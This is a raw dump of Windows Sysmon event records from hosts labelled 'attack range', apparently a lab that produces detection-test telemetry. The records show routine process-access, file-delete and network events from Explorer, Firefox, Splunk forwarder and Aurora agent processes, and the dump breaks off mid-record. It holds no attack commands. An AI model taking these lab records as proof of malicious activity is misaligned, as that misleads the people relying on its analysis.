10341000x800000000000000044740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.622{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+7d960|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd 10341000x800000000000000044739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.622{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7d441|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.622{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF2b9f3c.TMPMD5=2AA7CB51EE27EE713F4DD18E32FAF064,SHA256=C981D1CD4F1E046A7E8EC38215C304386C6E5C4D6D3916F519D35F8CC05312C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.588{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+7d960|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd 10341000x800000000000000044736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.588{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7d441|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.588{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms~RF2b9f1d.TMPMD5=79D2DBE2922CF7F4D7C2BDDB4BEFA511,SHA256=2E9DF25433B4D49CF46F4FE3281CE96D9C98ACDDDFFB7D6F80043CF798848D9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.153{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E2D15E855F40D380B8749600A58D55A,SHA256=7ABB7D87380773F8557B4F5A185A19C8FD19D0CCBAA7D2CD58A1B7DC2067A3B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017293Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:00.839{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=5290C0901832AC5CDEA8B4138B1071C9,SHA256=9CF600AA56E41AFC237470584AEB6CD3FDB5BA7FB83CF16A7CE108974D02CE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017292Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:00.021{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F372B017F9E87300F2029DC683CDF5C8,SHA256=0B1CAD1DADD5DA164E4EB2626BCC9D6369E37CA50A83DE9FB8DA9364630AE97B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:00.475{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2370A3EB7C02B7F644BC5A1C4A6AE8F8,SHA256=FF1F14F6F8456E3D26BDEAF70F635F46E5DB4E5C170DEBB1FD25890F3F681966,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:00.210{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=635240C2ED74424C7D33E1E601DFD435,SHA256=91A2E50F8D519F29E68488298EC2928292CBDECB17B96A5E2DB5650AFA29FCF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:00.210{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AC8207AB29026D408D59871D044D2A8,SHA256=9F09E70255A063C6658A884FDB2EDC7B4A3C38A0BC9D529001DB94B47BF5C595,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:59.515{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56400-false10.0.1.12-8000- 23542300x800000000000000044744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:01.242{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43C760307B4787CC91FA5A51679784F,SHA256=1B1B2B2A755E3A8C7CA3EEC6D413B29C7083F0D7B623C9F26C320339F082CDEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017294Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:01.104{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82BE934A026B25891A582DEF08CA68FC,SHA256=36F01F273A02A4F8681077B3062520F5A9A0E5723AFF918E5AD646E8FA2BA33A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:02.293{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BDB6698176904D7BFB6741AD9DCB86,SHA256=9E8C084BE1B4DE152D16356723229AF59E8022AEF8C133E329CAC73525630D28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017327Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:00.998{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50131-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000017326Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.739{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017325Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017324Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017323Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.731{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017322Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.726{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017321Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.724{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017320Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017319Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.719{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017318Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.718{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017317Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.715{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017316Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017315Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.703{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017314Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.701{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017313Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.697{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017312Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017311Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.686{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017310Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.677{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017309Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.672{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program 